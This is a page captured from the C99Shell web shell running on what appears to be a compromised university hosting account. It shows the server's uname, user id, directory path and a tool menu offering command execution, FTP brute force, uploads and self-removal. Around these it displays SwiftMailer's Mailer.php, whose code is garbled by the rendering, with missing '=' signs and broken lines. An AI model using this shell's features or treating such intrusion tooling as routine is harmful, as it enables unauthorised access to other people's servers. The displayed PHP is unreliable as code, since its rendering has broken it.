!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache/2.2.22 (Debian). PHP/5.6.36 

uname -a: Linux h05.hvosting.ua 4.9.110-amd64 #3 SMP Sun Nov 4 16:27:09 UTC 2018 x86_64 

uid=1389(h33678) gid=1099(h33678) groups=1099(h33678),502(mgrsecure) 

Safe-mode: OFF (not secure)

/home/h33678/data/www/it-man.ztu.edu.ua/src/vendor/swiftmailer/swiftmailer/lib/classes/Swift/   drwxr-xr-x
Free 116.64 GB of 200.55 GB (58.16%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     Mailer.php (2.83 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/*
 * This file is part of SwiftMailer.
 * (c) 2004-2009 Chris Corbyn
 *
 * For the full copyright and license information, please view the LICENSE
 * file that was distributed with this source code.
 */

/**
 * Swift Mailer class.
 *
 * @author Chris Corbyn
 */
class Swift_Mailer
{
    
/** The Transport used to send messages */
    
private $_transport;

    
/**
     * Create a new Mailer using $transport for delivery.
     *
     * @param Swift_Transport $transport
     */
    
public function __construct(Swift_Transport $transport)
    {
        
$this->_transport $transport;
    }

    
/**
     * Create a new Mailer instance.
     *
     * @param Swift_Transport $transport
     *
     * @return Swift_Mailer
     */
    
public static function newInstance(Swift_Transport $transport)
    {
        return new 
self($transport);
    }

    
/**
     * Create a new class instance of one of the message services.
     *
     * For example 'mimepart' would create a 'message.mimepart' instance
     *
     * @param string $service
     *
     * @return object
     */
    
public function createMessage($service 'message')
    {
        return 
Swift_DependencyContainer::getInstance()
            ->
lookup('message.'.$service);
    }

    
/**
     * Send the given Message like it would be sent in a mail client.
     *
     * All recipients (with the exception of Bcc) will be able to see the other
     * recipients this message was sent to.
     *
     * Recipient/sender data will be retrieved from the Message object.
     *
     * The return value is the number of recipients who were accepted for
     * delivery.
     *
     * @param Swift_Mime_Message $message
     * @param array              $failedRecipients An array of failures by-reference
     *
     * @return int The number of successful recipients. Can be 0 which indicates failure
     */
    
public function send(Swift_Mime_Message $message, &$failedRecipients null)
    {
        
$failedRecipients = (array) $failedRecipients;

        if (!
$this->_transport->isStarted()) {
            
$this->_transport->start();
        }

        
$sent 0;

        try {
            
$sent $this->_transport->send($message$failedRecipients);
        } catch (
Swift_RfcComplianceException $e) {
            foreach (
$message->getTo() as $address => $name) {
                
$failedRecipients[] = $address;
            }
        }

        return 
$sent;
    }

    
/**
     * Register a plugin using a known unique key (e.g. myPlugin).
     *
     * @param Swift_Events_EventListener $plugin
     */
    
public function registerPlugin(Swift_Events_EventListener $plugin)
    {
        
$this->_transport->registerPlugin($plugin);
    }

    
/**
     * The Transport used to send messages.
     *
     * @return Swift_Transport
     */
    
public function getTransport()
    {
        return 
$this->_transport;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by PinoyWH1Z | C99Shell Github | Generation time: 0.0112 ]--